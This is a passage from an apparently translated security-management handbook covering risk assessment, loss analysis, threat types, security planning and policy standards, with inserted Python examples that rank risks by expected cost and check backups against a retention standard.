d) a set of checklists, with comments from around the world, on security in business operations, particularly in relation to the financial sector and e-commerce applications.

45. BIST's Security and Risk Assessment Steering Committee
46. Internet Security Alliance
47. Forum of Incident and Response Security Teams
48. Computer Emergency Response Team
49. Incident Response Plan
50. Financial Intelligence Units
51. Financial Stability Institute
52. The Internet grew out of ARPANET, which was designed in 1969 by the Advanced
Research Projects Agency of the United States Department of Defense.

Chapter Three
Risk Evaluation and Loss Analysis

Overview

This chapter examines risk evaluation [53], loss analysis [54] and security damage from a business perspective; it studies the origin, the likely operation, and the severity of the effects of a range of security risks on day-to-day activities; it describes the main points of a sound security policy; and it also reviews the basic principles of loss analysis when a real security incident occurs.

Technology development: new frontiers

All organizations, small or large, now operate in a global environment. The progress of communications and transport networks over the last century has brought customers and markets closer together, driven costs to a minimum, and made it possible today to ship products to buyers anywhere in the world. From an international perspective, managers must consider a range of risks to their enterprises. From the end of the 1990s onward, many severe attacks took place around the world (such as the attack on the World Trade Center in 2001). In the face of such events, the need for physical security became entirely clear: the need for a police presence around buildings, control of entry to buildings, the design of sound policies for evacuation when an incident occurs, and the development of more reliable points of contact with local and national authorities.

On the technical side, correspondingly, work has begun on examining the threats, from inside and outside the organization, to computer equipment, applications, databases, and the networks that connect groups to one another. In the workplace, raw data such as customer records or credit card information are valuable targets for competitors and computer criminals and need special attention. In addition, in more advanced enterprises, intellectual property [55] such as scientific research documents or unique work processes is highly valuable and requires special security care. In a world where competition intensifies by the day, theft of raw data and intellectual assets by computer is on the rise. Measures such as "preventive support", taken into account in management's overall outlook and investment, the training and awareness of staff, and transparent communication within the organization all help to reduce the risks arising from physical security and cyber security violations.

53. Risk Evaluation
54. Loss Analysis
55. Intellectual Property

Know yourself

Although there are common plans and procedures for securing computer systems and buildings, a complete picture of the organization and of the form its activity takes is necessary for developing a good security plan. The set of security policies and procedures needed by a company that disposes of hazardous waste or biological materials differs from the policies and procedures needed by a manufacturer of electronic goods. To start the process by which management identifies potential security risks, it is useful to answer the following five questions:

1. What is the organization's main product or service? If there are several answers, try to prioritize them.
2. What are the organization's main sources of revenue and growth?
3. How is the organization structured? What are the different departments, and what are the main functions of each? How do these departments operate, how do they communicate with one another, and how do they work together as a single whole?
4. Which information is most sensitive for each department, and which technologies are used to store and distribute this information outside and inside the organization?
5. Who are the organization's customers, partners and vendors, and how do they interact with the organization?

The information needed to answer these questions can be obtained by talking to employees (especially IT staff), managers and the company's board of directors. Assessing the views of customers and vendors on other matters may lead to the discovery of new security issues. Finally, the team that gathers the information should be familiar with the way the media report on the company. Public opinion can also have an effect, especially if the company operates in a controversial industry or in a sensitive position, or if reports about it appear regularly in the press.

Know the enemy: internal and external threats

Once the company has assessed its structure and operation, it is in a good position to draw up a description of its potential security strengths and weaknesses. It is better to concentrate on general threats at first. Once these threats have been identified, it becomes possible to assess the level of internal and external threats in the activities associated with each of them.

The general threats to any company or formal organization are:

Physical threats

• natural disasters (fire, earthquake, severe storms and flood);
• theft;
• sabotage;
• physical interference;
• network sabotage; and
• organized espionage.

Software threats

• penetration of firewalls;
• malware (viruses, Trojans, worms);
• unauthorized disclosure or destruction of data; and
• organized espionage by digital means.
From the standpoint of human threats, the company must identify malicious actors both inside and outside the organization. In some cases an internal security breach is the result of human error: a simple oversight, carelessness, or inadequate staff training. In other areas, organized espionage in particular, social engineering can be used to gain access to facilities and to the organizational and confidential data held by knowledgeable insiders. A suitable set of policies should be drawn up by the security department in cooperation with the personnel department to help reduce these risks. The security and personnel departments can also work together on hiring and dismissal procedures. Although in some cases no clear motive can be found for malicious acts, the different motives behind such destructive computer activity call for detailed explanation. Those who break into computers cannot really be classified, but the severity of the threats, and correspondingly the damage to be expected from each, can be discussed in general terms.

Casual hackers (summertime hackers) are employees of an organization who are familiar with network protocols. They do not usually intend to destroy the company's data and assets, but out of curiosity they try to reach resources they are not authorized to use. Even so, they may not be fully familiar with intrusion tools and may damage systems by using the tools incorrectly. In addition, tools downloaded from the Internet may contain a backdoor or a Trojan that other attackers then make use of. Casual hacking therefore counts as a major threat, and this is the main reason it is prohibited.

Within the casual-hacker category, some employees break into the system out of boredom with their work or the attraction of a technical challenge. Others are after information about colleagues' promotions and pay, or organizational data. Still others may do so in order to retaliate against the organization, or may create unintended threats because the system is not properly protected owing to inadequate technical training or staff carelessness.

"Script kiddies" are usually younger hackers (of high-school or pre-university age) who have good computer skills and plenty of free time, but who are not particularly expert and use scripts written by others to carry out their intrusions. On the whole, people in this category do not concentrate on destruction in the way that targeted criminals (discussed below) do, but they are numerous and sometimes work in teams, and in that form they naturally pose a greater threat. Script kiddies publicize their successful break-ins and claim fame through them; in fact they take pride in the notoriety that the sheer volume of their attacks earns them. Because this threat is so widespread, makers of security software have produced effective tools to prevent this kind of intrusion. Firewalls and intrusion detection systems (IDSs) were developed to defend against such attacks.

Targeted criminals are usually skilled attackers whose aim is to steal information, to damage and destroy data, and to put systems out of action for a period of time. Unlike casual hackers and script kiddies, their goal really is to break into systems. In some cases they are after valuable information such as financial data (credit card numbers and bank account details) or personal information (identification numbers, academic records and customer files), in order to alter it or exploit it in some other way. Attackers of this kind are often well organized and gather valuable information about the victim organization before launching the main attack. Fortunately there are fewer criminals of this type than of the others, but keeping them out is very difficult, and a successful intrusion can cause serious damage.

Employees and consultants can create serious threats to the system, deliberately or inadvertently, depending on the nature of their relations with their managers and colleagues in the workplace. Because of the level of access they have inside the organization, these people are a serious security concern.

Each of these potential human threats carries a different level of risk for systems and security information, and different methods are needed to prevent them. Up-to-date firewalls and intrusion detection systems may be enough to keep out casual hackers or script kiddies. Targeted criminals, however, have to be identified and stopped by vigilant system administrators and managers, and here personnel policies and management attention to neutralizing possible insider attacks will help. No plan is flawless, though, and it is very important that the organization continually review the record and trend of these plans in the light of security breaches. Continuous monitoring of the security landscape makes intrusions easier to detect and prevent. In addition, clear policies on what must be done during and after an attack help limit the damage, guide those responsible for dealing with it, and make it possible to record properly the reports needed by authorities inside and outside the organization.

Practical Security Assessment: Risk Estimation and Loss Analysis

As we have seen, security violations stem from internal and external attacks and lead to unauthorized access to systems and data for illegal and unethical purposes. The first steps toward a security policy are taken once the organization has made a security assessment of its internal processes, its goals and its existing vulnerabilities. Once these elements have been analyzed, a security policy and a plan for procedures can be developed.

This plan should contain information on the following key areas:
• Knowing when you are under attack - by deploying intrusion detection systems and through internal vigilance.
• Preparing a worst-case scenario - thinking through the compounded effects that a security breach could have on you.
• Drawing up a written policy for recording security incidents (known as a break-in plan) - this written document helps in analyzing individual incidents and in preventing successful attacks in the future.
• Hiring a specialist when needed - on a per-incident basis or under a periodic consulting agreement. Avoid hiring self-proclaimed hackers (people who claim to be hackers). Outsourcing security is discussed later in this part. [63]
• Providing the necessary training for technical staff and other employees - many security failures come from a lack of adequate knowledge of the procedures for dealing with security issues. Every employee in the company should know how to carry out the security procedures.
• Designating a point of contact - this person should be an information technology specialist and should report incidents directly to members of the management team.
• Understanding and prioritizing goals - which include all or some of the following:
  o protecting customer information;
  o preventing the attack;
  o notifying senior management of the attack;
  o logging events;
  o taking snapshots of the system;
  o contacting the computer security incident response team;
  o identifying the attacker;
  o identifying the people responsible in each case; and
  o identifying a person who can be trusted.

[63] This recommendation is practical mainly for medium-sized and large organizations, and also for companies that depend heavily on technology for their activities and whose target market is an advanced technical one. In the latter case, potential customers may form opinions about the company, based on its technical image and the soundness of its operations, that create a positive or negative climate around it.
If an incident occurs, you can re-examine your existing policies and procedures and strengthen them as far as your budget and logistics allow. When assessing the organization, there is a set of questions that can help you identify the strengths and weaknesses of the security plan. A sample list, focused on the ability to respond effectively to an intrusion, follows:

Incident-handling procedures, recovery plans and required funding:
o Are there procedures for responding to incidents?
o Are the procedures understandable and up to date?
o Have the necessary plans been prepared for recovering from natural disasters?
o Has enough funding been allocated to respond properly to an incident?

Procedures for security specialists and management:
o Do the procedures include instructions for contacting a security specialist around the clock, seven days a week?
o If the security specialist is unavailable, is there a way to inform management of the problem?
o Is there a defined way of informing the chief information officer (if there is one) of possible incidents?
o Is there a procedure that determines when to contact outsiders for help and who should make that contact?

Personnel procedures:
o Have all key staff been trained to apply the procedures?
o Do key staff actually attend all the training sessions?
o Were key staff selected on the strength of their outstanding records?
o Is communication between system administrators and the security groups smooth?

Technical resource procedures:
o Are there instructions for starting and shutting down system programs?
o Are the plan's start-up and shutdown instructions reviewed periodically?
o Are the tools needed for intrusion detection installed and active on the system?
o Can the detection software installed on the network identify unknown attacks?
o Can you use a layered structure to detect attacks on the network and prevent them?
o Can attacks be traced easily on the network?
o According to a formal security audit, do all systems have adequate security controls?

The first step toward improving the security of your system is to answer these basic questions:
1. What am I trying to protect, and how much is it worth to me?
2. What do I need to protect against?
3. How much time, effort and money am I willing to spend to obtain adequate protection?

These questions form the basis of a process called risk assessment. Risk assessment is a very important part of the computer security process. If you do not know what you are protecting and what you are protecting it against, you cannot plan the steps for doing so. Once you know the risks, you can design the policies and techniques you need to carry out your risk-reduction plans. For example, if there is a risk of a power failure and that matters to you, you should reduce the risk by using an uninterruptible power supply (UPS).

Steps in Risk Assessment

Risk assessment consists of three key steps:
1. Identifying assets and their value
2. Identifying threats
3. Calculating risks

There are many ways of carrying out this process. One method that has proved very successful is to hold a series of in-house workshops. You invite knowledgeable users from different departments, middle managers and your organization's executives, and over a number of sessions you compile a list of assets and threats. This process not only helps you produce a more complete list but also raises the participants' awareness of security issues.

A statistical approach is far too complicated to be used for protecting a home computer or a very small company. By the same token, the procedures presented here are not sufficient for protecting large companies, government organizations and major universities. In such cases many organizations use consulting firms that specialize in risk assessment, and others use specialized assessment software.

Identifying Assets

Draw up a list of the items that need protection. The list should be based on your business plan and common sense. The process requires knowledge of the applicable laws, a thorough understanding of your facilities, and knowledge of the extent of your insurance coverage. Items to be protected may be tangible (such as disk drives, monitors, network cables, backup equipment and manuals) or intangible (such as access to the computer, the master password, the ability to continue processing, customer lists, public image and standing in the industry). The list should include everything that is of value to you. To judge whether an item is valuable, consider what it would cost you in time and money to repair or replace it if it were damaged or lost. Some of the items that should certainly be on your assessment list are:

Tangibles:
o computers;
o proprietary data;
o backups and archives;
o instructions, guides and books;
o printouts;
o commercial software distribution media;
o communications equipment and cabling;
o personnel records; and
o audit records.

Intangibles:
o safety and health of personnel;
o privacy of users;
o personnel passwords;
o public image and reputation of the organization;
o customer goodwill;
o processing availability; and
o configuration information.

Rather than looking only at the computing side, you should take a broader view of the items above and other related matters. If you are concerned about someone reading your financial reports, how that person gets at the information (through paper copies, through electronic mail, or through direct access to the backups) is of no particular importance; every route to doing so must be blocked.

Identifying Threats

The next step is to compile a list of the threats to your assets. Some threats are environmental and include fire, earthquake, explosion and flood. These lists should also include events that are very rare but possible, such as a structural failure in the building or the discovery of flammable material in the walls of the computer room, which could force you to vacate the room for a fairly long time. Other threats come from staff and from people outside the organization. Some examples of this kind of threat are:
• illness of key people;
• simultaneous illness of many staff (contagious illnesses such as influenza, for instance);
• loss of key personnel (death, retirement, end of employment);
• loss of telephone or network services;
• loss of utilities (telephone, electricity, water) for a short time;
• loss of utilities for a long time;
• lightning;
• flood;
• theft of disks or tapes;
• theft of a key person's laptop;
• theft of a key person's home computer;
• introduction of a virus into the systems;
• bankruptcy of a vendor or of a company providing key services under contract to you;
• hardware faults;
• software faults;
• sabotage by employees;
• sabotage by third-party personnel (for example a vendor's support staff);
• labor unrest;
• attackers who gain access to your machines at random;
• users who post inflammatory or proprietary organizational information on the Internet; and
• organized commercial spies.
Calculating Risks

Risk assessment should not be done once and then forgotten. It should be carried out regularly and periodically - at least once a year, or whenever major changes take place in personnel, systems or the operating environment. [70] In addition, threats must be reassessed whenever a serious change occurs in structure or operations. So if you reorganize, move to a new building, change your contract vendors or make any other serious change, you should reassess the threats and potential damage.

[70] Changes in personnel may mean the hiring or retirement of a large number of people, or the retirement of someone who has been active in the organization's security plan. Changes in systems may mean the installation of several new systems. If you have 100 computers and, observing safe practice, add 1 more, a fresh risk assessment is not necessary; but if you have, say, 10 computers and add another 10, the expansion may introduce an entirely new dimension to your organization. Other system changes can include bringing up new internal and external networks, upgrading systems, or changing the computing platform. Changes in the organization usually take the form of rapid growth, new relationships with foreign vendors or customers, and marketing companies that may give you a greater presence in local and global markets.

Loss Analysis

Determining the cost of losses can be very difficult. A simple way of calculating it is to count only the cost of repairing or replacing equipment and products. A more sophisticated method takes into account the cost of being out of service, retraining, the extra procedures made necessary by the damage, the loss of the company's reputation, and even the damage done to the company's customers. In general, adding secondary factors to the cost calculation means more work but makes the estimate more accurate. In most cases there is no need to determine the value and cost of each risk precisely; ordinarily it is enough to assign a cost range or bracket to each threat. Some damaged items can be classed as irreparable, irreplaceable or unrecoverable, for example the complete erasure of the accounts database or the death of a key employee. You may want to examine the cost of these losses on a finer scale, for example by assigning a separate cost to each of the following:
• unavailability in the short term (less than 7 to 10 days);
• unavailability in the medium term (1 to 2 weeks);
• unavailability in the long term (more than 2 weeks);
• permanent loss or destruction;
• accidental loss or destruction;
• deliberate loss or destruction;
• unauthorized disclosure of information within the organization;
• unauthorized disclosure of information to outside sources;
• full unauthorized disclosure of information to all outside sources, competitors and the press; and
• cost of replacement or recovery.

Probability of Loss

Once you have identified the threats, you need to estimate the likelihood of each one occurring. Estimating these threats on a yearly basis is one of the simplest methods. Quantifying a risk is a very difficult task. You can obtain such estimates from other companies (an insurance company, for instance). If the event has occurred several times in succession, it can also be estimated from past records. Industry organizations usually collect statistics and publish reports. You can also bring your own guesses closer to reality on the basis of past experience. For example:
• The power company has an estimate, based on its experience over the past year, of the likelihood of a power failure during the coming year. The responsible authorities can also calculate the risk of power being lost for a few seconds, a few minutes or a few hours.
• Personnel records can help you estimate the likelihood that a key member of the computing staff will resign.
• The most optimistic guesses about a repeat of past experience can be used to estimate the likelihood that serious flaws will be discovered in your software during the coming year.
If you expect an event to occur more than once a year, record the number of times it occurs in the course of a year. For example, if you predict an earthquake once every 100 years, it goes into your list as 1%, as explained above; but if you expect three serious flaws to be discovered in the Microsoft IIS server during the coming month, the figure will be 3600%.

Cost of Prevention

Finally, you need to calculate the cost of preventing each kind of risk. For example, the cost of a momentary power failure is probably the cost of staff idle time and of restarting the computers, whereas the cost of preventing it is the cost of buying and installing a UPS system.

Costs should be amortized over the expected lifetime, using an appropriate approach. Working out these costs may reveal other costs and credits that also need to be taken into account. For example, installing a better fire-suppression system can reduce your fire insurance premium and, through capital depreciation, give you a tax benefit; but spending money on a fire-suppression system means that the money is no longer available for other purposes such as staff training or even investment.

Summarizing the Results

In the concluding part you should draw up a multi-column table of assets, risks and possible losses. For each loss you need to know its probability, the predicted loss, and the amount of money required to prevent it. If you are being very precise, you can also calculate the probability that the defensive measures will prove inadequate. The process of deciding whether or not to adopt each defensive mechanism is now quite straightforward. Simply multiply the expected loss for each risk by its probability of occurrence to obtain a figure for each threat. Sort these figures in descending order and compare the figure for each threat with the cost of preventing it.
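The ranking this section describes, worked through in Python as an added example (it is not part of the handbook): each risk's loss plus recovery cost is multiplied by its yearly frequency, the results are sorted in descending order, and each is compared with the amortized yearly cost of its control. All figures are constructed; straight-line amortization, the `p_inadequate` discount and the budget walk in `fund` are assumptions of this example.

```python
"""Rank risks by expected annual cost and compare each with its prevention cost."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Risk:
    threat: str
    loss: float                # average loss per occurrence
    recovery: float            # repair/recovery cost per occurrence
    per_year: float            # expected occurrences per year (0.01 = 1%, 36 = 3600%)
    control: str               # the preventive measure being considered
    purchase: float            # one-off cost of the control
    lifetime_years: float      # expected useful life of the control
    upkeep: float = 0.0        # recurring yearly cost of the control
    p_inadequate: float = 0.0  # probability that the control proves inadequate


def expected_annual_cost(r):
    """(loss + recovery) multiplied by the yearly frequency."""
    return (r.loss + r.recovery) * r.per_year


def annual_prevention_cost(r):
    """Purchase price amortized straight-line over the lifetime, plus upkeep."""
    return r.purchase / r.lifetime_years + r.upkeep


def avoided_cost(r):
    """The share of the expected cost that the control actually removes."""
    return expected_annual_cost(r) * (1.0 - r.p_inadequate)


def rank(risks):
    """Rows sorted by expected annual cost, highest first, each with a decision."""
    rows = []
    for r in sorted(risks, key=expected_annual_cost, reverse=True):
        worthwhile = annual_prevention_cost(r) < avoided_cost(r)
        rows.append({
            "threat": r.threat,
            "control": r.control,
            "expected": round(expected_annual_cost(r), 2),
            "prevention": round(annual_prevention_cost(r), 2),
            "decision": "prevent" if worthwhile else "accept",
        })
    return rows


def fund(risks, yearly_budget):
    """Walk the ranked list and fund worthwhile controls while money remains."""
    funded, remaining = [], yearly_budget
    for row in rank(risks):
        if row["decision"] == "prevent" and row["prevention"] <= remaining:
            funded.append(row["control"])
            remaining -= row["prevention"]
    return funded, round(remaining, 2)


# Constructed sample figures, in arbitrary currency units.
SAMPLE = [
    Risk("earthquake", 2_000_000, 500_000, 0.01,
         "seismic retrofit", 400_000, 10),
    Risk("serious web server flaws", 1_000, 500, 36,
         "patch management", 10_000, 5, upkeep=12_000, p_inadequate=0.25),
    Risk("momentary power failure", 800, 200, 12,
         "UPS", 6_000, 5, upkeep=300, p_inadequate=0.05),
    Risk("fire", 900_000, 100_000, 0.02,
         "fire suppression", 60_000, 15, upkeep=1_000, p_inadequate=0.2),
    Risk("theft of a key person's laptop", 15_000, 3_000, 0.1,
         "disk encryption", 2_000, 4, upkeep=1_500, p_inadequate=0.1),
]

if __name__ == "__main__":
    for row in rank(SAMPLE):
        print(f"{row['threat']:32} {row['expected']:>10,.0f} "
              f"{row['prevention']:>10,.0f}  {row['decision']}")
    print(fund(SAMPLE, 18_000))
```

With a yearly budget of 18,000 the walk funds patch management and the UPS and skips fire suppression, which is worthwhile on its own figures but no longer affordable once the higher-ranked control has been paid for.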
The result of this comparison is a prioritized list of what needs to be done. The list may be somewhat surprising at first. Bear in mind that your aim should be to prevent costly and probable losses and to pay less attention to rare and inexpensive ones. In many environments, events such as fire and the loss of key personnel are far more likely than a network break-in; yet, surprisingly, it is network break-ins that attract managers' attention and, as a result, the larger part of the budget. This practice is not cost-effective and does not give the system as a whole the highest level of assurance. To get a picture of the actions you should take, classify by priority what you have gathered about preventing and recovering from each event. To do this, add the cost of recovery to the average expected loss and multiply the sum by the probability of the event. Then compare the results with the annual cost of prevention. If the costs are lower than the expected cost of the risk, you are advised to adopt the prevention strategy, provided sufficient funds are available; but if the cost of prevention is higher than the cost of the damage and of recovery after the event, take no action until the incident occurs.

Chapter Four
Planning for Security Needs

Overview

This chapter deals with the policies and procedures for preventing, and defending effectively against, the threats discussed in the previous chapter, and describes the planning process in detail.

Policy-Making and Technical Solutions for Successful Security

Fundamentally, computer security is a set of technical solutions to non-technical problems. A great deal of time, money and effort can be spent on securing a computer, but you can never be rid of the worry that data will be deleted by accident or information destroyed on purpose. Given the right set of circumstances - software flaws, accidents, mistakes, bad luck, bad weather, or a well-equipped and motivated attacker - any computer can be misused, put out of action, or even destroyed completely.

The job of security professionals is to help the organization decide how much time and money it wants to devote to security. Another part of the job is to make sure that the organization has suitable policies, guidelines and procedures in place so that the security budget is spent properly. Finally, the professionals must audit the system to make sure that the appropriate controls have been implemented correctly to achieve the goals. Practical security is therefore more a management issue than a technical one. It follows that security must be one of the priorities of the organization's management. Even in very small establishments where no significant budget is spent on security, management must understand the main security issues and put the basic principles of security into practice to protect its assets.

Security planning can be divided into five discrete steps:
1. Planning to determine security needs
2. Assessing risk and choosing best practices
3. Creating policies that reflect those needs
4. Implementing security
5. Auditing and responding to incidents

There are two basic principles implicit in effective policy and security planning:

Within organizations, awareness of security and of security policy must spread from the top down. Users' concerns about, and awareness of, security issues are important, but users cannot create and sustain an effective security culture across the organization. It is the organization's managers who must treat security as an important matter and who must accept and follow its rules and regulations just like everyone else.

Effective computer security means protecting information. Protecting other resources matters too, but losses from damage to other resources are far easier to identify and remedy than losses to information. All plans, policies and procedures must reflect the need to protect information in whatever form it takes. Proprietary information does not lose its value when it is printed or faxed to an office. Confidential customer information is still just as valuable when it is reported by telephone instead of being sent by electronic mail. In short, information must be protected regardless of the form it is in.

There are many kinds of computer security and many different definitions of it. Rather than offering a formal definition, this book pays more attention to a practical approach and discusses the kinds of protection that should be considered.

Classification of Security Considerations

Within this broad definition there are different kinds of security that administrators and users need to pay attention to: [71]

Confidentiality
Protecting information from being read or copied by anyone who does not have the owner's authorization to access it. This kind of security covers not only the protection of information as a whole but also the protection of individual pieces of data that may be harmless in themselves but from a number of which confidential information can be inferred.

Integrity
Protecting information (including programs) from being deleted or altered in any way without the permission of its owner. The information to be protected includes accounting records, backups, file creation times and documents.

Availability
Protecting services so that they are not degraded or destroyed without authorization. If the system and its data are unavailable when an authorized user needs the information, the outcome can be just as bad as if the information had been deleted from the system.

Consistency
Making sure that the system behaves as its users expect. If software or hardware suddenly starts behaving very differently from before - especially after an upgrade or a bug fix - many problems can arise. Imagine what would happen when listing files if the "ls" command were accidentally deleted! This kind of security can be described as assurance of the correctness of the data and software in use.

Control
Regulating access to the system. Unknown and unauthorized people (or software) in your system can cause a great deal of trouble, and you will worry about how they got in, what they may have done, and who else may have had access to your system. Recovering from such problems can be very time-consuming and costly. You may have to reinstall and set up your system from scratch, only to find that no significant change had taken place - even if nothing at all had actually happened.

Audit
Just as you are concerned about unauthorized people gaining access to the system, you must also allow for the possibility of mistakes or malicious acts by authorized users. In such situations you need to establish what was done, who did it, and what was affected. The only sure way of doing so is to keep indestructible records and logs of activity on the system that identify people and what they did. In some highly sensitive applications, the audit mechanism may be extensive enough to allow the system to be returned to its original state after it has been put into a new one.

[71] See the COBIT approach to security guidance: http://www.isaca.org/cobit.htm
Although all of these aspects of security are important, different organizations attach different degrees of importance to each of them. The difference arises because every organization has its own security concerns and must set its priorities and policies accordingly. For example:

Banking environment
In such an environment integrity, control and audit are vital principles, while confidentiality and availability come next in importance.

Military environment
In a national defense system that holds classified information, confidentiality comes first in importance and availability last. In some highly classified environments, officials may prefer to blow up a building rather than let information fall into the hands of attackers.

University environment
In such an environment the integrity and availability of information are the most important requirements. Making sure that information is available when students need it matters far more than administrators being able to determine when students used their accounts.
If you are a security administrator, you need to understand the needs of your operating environment and your users, and then define your procedures accordingly. It goes without saying that the material described in this book is not necessarily appropriate for every environment.

Trust

Security professionals do not usually describe computer systems as "secure" or "insecure"; instead they use the word "trust" to describe the level of confidence expected of a computer system. The reason is that absolute security can never be achieved. We can only come close to it by building sufficient trust in the overall configuration and making sure that it is used for the intended applications. Building sufficient trust in computer systems requires careful thought and planning. Operational decisions and, where possible, overall policies should be based on a risk assessment, and expert advice is very important here:

If you work in a larger company, university or government organization, we suggest that you contact the company's internal audit or risk management departments for the help you need (they may be using plans and policies that you need to know about). You can also learn more about the subject from the resources listed in the appendices. You may want to enlist the help of a consulting firm. Many accounting and auditing firms, for example, have teams of specialists who can assess the security of computer installations.

If you work with a smaller company or deal with personal computers, you may have no specialized security department. In that case you are advised to study Part Two of the book carefully. You may feel that this book goes into more detail than you need, but the information in these chapters will be a great help to you in setting your priorities.

Cost-Benefit Analysis and Best Practices

Once the risk assessment is complete, you will have a long list of risks in front of you - far more than you could possibly address or counter. Because time and money are limited, you now need a way of ranking these risks so that you can decide which ones you want to mitigate, in impact and likelihood, by technical means, which ones to insure against, and which ones simply to accept. Traditionally, the decision about which risks to counter and which to accept is made by means of a cost-benefit analysis: assigning a cost to each possible loss, determining the cost of countering it, determining the probability of each risk, and then determining whether the cost of countering it outweighs the benefit of prevention.

Risk assessment and cost-benefit analysis generate a great many numbers, which makes the process look thoroughly scientific and logical; in practice, however, collecting and combining these numbers can be very time-consuming and expensive, and the outcome is only a set of imprecise figures. Risk assessment depends on being able to measure the expected use of an asset, estimate the likelihood of risk to that asset, identify the factors that make risks more likely, and calculate the potential impact of each choice - all of them measures that are very hard to obtain. How do you calculate the risk that an attacker will be able to gain administrator privileges on your system? Does that risk grow over time as new vulnerabilities are discovered, or shrink over time as vulnerabilities are fixed? Does a well-maintained system become more secure or less secure as time passes? And how do you calculate the approximate damage from a successful break-in? Unfortunately, little scientific or statistical work has been done on these questions. A great many people think they know the answers, but researchers have shown that most people cannot estimate risks and their likelihood correctly on the basis of personal experience.

Because of the difficulties inherent in risk assessment, another approach to computer security has emerged in recent years, known as best practices or due care. It consists of a set of recommendations, procedures and policies that are generally accepted within the security research community and that bring organizations to an acceptable level of overall security and reduce risk at a reasonable cost. You can think of best practices as "the self-evident basics of implementing security measures sensibly".

Using best practices has its problems too. The biggest is that no single set of best practices is right for every environment and every user. The best practices for a website that handles financial information may resemble those for the website of a community newsletter, but the site holding financial information will very probably need additional security measures.

Following best practices cannot guarantee that your system will be free of security problems. Under most best practices, the organization's security department has to watch the Internet for news of new attacks and download the patches issued by software vendors. But even if you follow this regime, attackers may still use new, unpublished and previously unknown techniques to take over your computer system. And if you are not well informed about the latest news, or the person responsible for checking the mailing lists is away on a trip, the attacker will get ahead of you.
The idea that tens of thousands of organizations can or should implement the existing best practices for securing their computers is problematic, because the existing best practices are not appropriate or cost-effective for every organization. Many organizations that claim to follow best practices in fact apply only minimum standards to the security of their machines; and in practice the best practices, or in other words the optimal solutions, are not really optimal themselves!

Our recommendation is a combination of the two approaches, risk assessment and best practices. Starting from the body of a set of best practices, an informed designer should assess the risks and propose a reasonable solution for each particular state of the system. For example, servers should be placed on separate machines and configured through an operating system and software on which the minimum security capabilities are enabled. Operators must be aware of changes, keep themselves up to date with patches, and expect the unexpected. Doing these things properly requires a deep understanding of how the system works and of the reasons it malfunctions. This is the approach followed in the following parts of this book.

Part Three: IT Security and Organizations

Chapter Five
Prevention and Organizational Security Policy

Overview
This chapter describes in full the different levels of security policy, in which every employee of the organization has a role to play in the security of computers, networks and information. The management checklists referred to in this section can be found in the final chapters of this part of the book.

Security in a Functioning Organization
Security is not free. The more extensive your security measures become, the higher their cost will be. Systems that offer higher security are usually harder to use. Security may also be threatened by powerful users, who want to do difficult and sometimes dangerous things but are often not authorized to do them and are not accountable for the consequences. Some of these users may hold political power within the organization. On the other hand, some organizations may feel that securing the organization to an adequate level is very expensive, and for that reason carry on operating without spending time on assessing the real costs of these risks and without regard to security considerations.

Normally, a policy is drawn up for this purpose and must be formally adhered to. Carrying out this process is usually an uphill battle. The purpose of risk assessment and cost-benefit analysis is to prioritize your security actions and spending. If your business plan is such that you must not carry an uninsured risk during the year whose cost exceeds a given amount, you can use risk assessment to find out what costs you must bear to reach that goal. The assessment can also guide you on which step to take first and which second, and which tasks to defer to later years. Another benefit of risk assessment is that it convinces the company's management that you need more resources to establish security.

At the end of Part Three, a set of checklists is provided that describe the steps needed to ensure maximum safety at various levels, given time, personnel and financial constraints.

After completing the risk assessment and cost-benefit analysis, you must convince the organization's management to act according to the plan. Most managers know little about computers, but they do understand risk assessment and cost-benefit analysis. If you can show that the organization currently faces a risk that could cause large annual costs (to do so, add up all the losses and the repair costs of everything currently in use), then this estimate may convince management to invest more in resources and staff in order to avoid the risks.

On the other hand, if you go to management with vague statements such as "There is a high probability that several break-ins will occur over the Internet after the next CERT/CC announcement," it is very unlikely to produce anything other than very mild concern (and even that only in some cases)!

The Role of Security Policies
A security policy helps to define the organization's assets and also specifies the steps that must be taken to protect those assets.

Security policies can be drawn up in several different ways. You can write a very simple general policy of a few pages that covers most eventualities. You can also draw up a specific policy for each of your different assets, such as an e-mail policy, a personnel data policy and a user account information policy. A third approach, which many companies have used and which is workable for companies of all sizes, is to have simple, concise policies, standards and guidelines that have been improved with best practices. Below we briefly describe this last approach; further resources on the subject are listed in the references section.

Policy plays three major roles. First, it makes clear what is being protected and why; second, it specifies the responsibility for providing that protection; and third, it provides a basis for interpreting and resolving conflicts that may arise in the future. What should not appear in the policy is a list of threats, machines and individuals (by name). The policy should be general and should rarely change over time.

Standards
Standards are used to set out successful security practice within an organization, and their statements usually use the verb "must." Standards are generally written independently of particular technical platforms and define at least one criterion for determining whether or not they have been met.
Standards are developed in support of policy and change slowly over time. Standards may cover matters such as how new hires are to be made, how long backups must be retained, and how UPS systems are tested.

As an example, consider a standard for backups. It might read as follows:

"Backups must be made of all Internet data and software, on a regular schedule. Under no circumstances may routine backups be performed less often than once every seventy-two hours. All backups must be kept for a period of at least six months; and the first backup of January and of June of each year is kept forever in a secure location off-site. At least every other week, a full backup of the entire system must be made. All backup media must meet the accepted industry standards for their type, so that the information on them is still recoverable after at least five years in an unattended storeroom."

This standard names no particular backup mechanism or software package; yet it states clearly what must be stored, for how long it must be stored, and how often this must be done.

Consider a reasonable standard for authentication:

"Every user account on a multi-user computer must have only one authorized user. That user must prove his or her identity to the system by means of an authenticator. Proof of identity to the computer can be given with an authentication token, a smart card, a one-time password, or an approved biometric measure. On any computer that has ever been connected to a network, been portable outside the company, or been used outside a private office, reusable passwords must not be used as the primary authentication mechanism."
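The backup standard quoted above supplies measurable criteria, which is what makes it checkable. The following Python code is an added illustration, not part of the book: it audits a constructed backup log against those criteria. The record fields, the rule codes, and the readings of "every other week" as 14 days and "six months" as 183 days are assumptions of this example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Limits taken from the quoted backup standard. The exact day counts used for
# "every other week" and "six months" are assumptions of this example.
MAX_GAP = timedelta(hours=72)      # routine backups at least once every 72 hours
MAX_FULL_GAP = timedelta(days=14)  # a full backup at least every other week
RETENTION = timedelta(days=183)    # every backup kept for at least six months
ARCHIVE_MONTHS = (1, 6)            # first backup of January and June kept off-site forever


@dataclass(frozen=True)
class Backup:
    """One entry of a backup log (field names are hypothetical)."""
    taken: datetime
    full: bool = False
    restorable: bool = True        # media still exists and reads back
    offsite_forever: bool = False  # a permanent off-site copy was made


def _gaps(times, now, limit):
    """Yield (start, end) where consecutive backups, or the last one and now, are too far apart."""
    points = sorted(times) + [now]
    for start, end in zip(points, points[1:]):
        if end - start > limit:
            yield start, end


def audit(backups, now):
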